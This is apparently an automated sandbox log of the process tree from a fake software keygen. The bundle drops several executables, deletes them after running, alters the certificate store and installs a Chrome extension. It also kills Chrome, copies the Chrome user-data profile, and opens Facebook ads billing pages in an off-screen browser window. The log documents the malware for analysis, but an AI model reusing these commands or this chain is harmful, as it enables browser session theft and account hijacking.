PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff833776e00,0x7ff833776e10,0x7ff833776e20
2⤵
PID:476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1564 /prefetch:2
2⤵
PID:3956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1600 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:1
2⤵
PID:784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
2⤵
PID:3328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
2⤵
PID:3936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
2⤵
PID:2280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
2⤵
PID:3548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
2⤵
PID:1960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4116 /prefetch:8
2⤵
PID:2660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5224 /prefetch:8
2⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:8
2⤵
PID:4224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8
2⤵
PID:2244

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
2⤵
PID:4272

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff786a07740,0x7ff786a07750,0x7ff786a07760
3⤵
- Drops file in Program Files directory
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
2⤵
PID:4308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:8
2⤵
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4772 /prefetch:8
2⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4980 /prefetch:8
2⤵
PID:4536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:8
2⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:8
2⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:8
2⤵
PID:4652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4156 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:8
2⤵
PID:4736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4536 /prefetch:8
2⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8
2⤵
PID:4868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:8
2⤵
PID:4924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:8
2⤵
PID:500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6112 /prefetch:8
2⤵
PID:5096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5160 /prefetch:8
2⤵
PID:3692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6356 /prefetch:8
2⤵
PID:4220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6480 /prefetch:8
2⤵
PID:2660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6628 /prefetch:8
2⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:8
2⤵
PID:4300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
2⤵
PID:4380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7004 /prefetch:8
2⤵
PID:4436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6620 /prefetch:8
2⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7320 /prefetch:8
2⤵
PID:4248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7508 /prefetch:8
2⤵
PID:4856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:8
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:8
2⤵
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:8
2⤵
PID:3656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
2⤵
PID:2244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8040 /prefetch:8
2⤵
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8364 /prefetch:8
2⤵
PID:5040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8484 /prefetch:8
2⤵
PID:5012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3992 /prefetch:8
2⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
2⤵
PID:5064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:8
2⤵
PID:3348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:8
2⤵
PID:4052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8960 /prefetch:8
2⤵
PID:4448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9132 /prefetch:8
2⤵
PID:5068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4160 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
2⤵
PID:4256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4160 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6348 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8684 /prefetch:8
2⤵
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3952 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2376 /prefetch:8
2⤵
PID:4300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3488 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 /prefetch:8
2⤵
PID:1628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1384 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 /prefetch:8
2⤵
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
2⤵
PID:5096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8
2⤵
PID:928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1396,18236835401698986140,13033088673283414797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
2⤵
PID:3272

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3348

C:\Users\Admin\AppData\Local\Temp\Temp2_R_R_Report_Writer_8_keygen.zip\R_R_Report_Writer_8_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_R_R_Report_Writer_8_keygen.zip\R_R_Report_Writer_8_keygen.exe"
1⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:4520

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
PID:4216

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:1336

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:4704

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4800

C:\Users\Admin\AppData\Roaming\2F97.tmp.exe
"C:\Users\Admin\AppData\Roaming\2F97.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1580

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\2F97.tmp.exe"
5⤵
PID:4104

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:5084

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4616

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:200

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:4552

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4816

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:4416

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3512

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4684

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:3980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4128

C:\Program Files\Google\Chrome\Application\chrome.exe
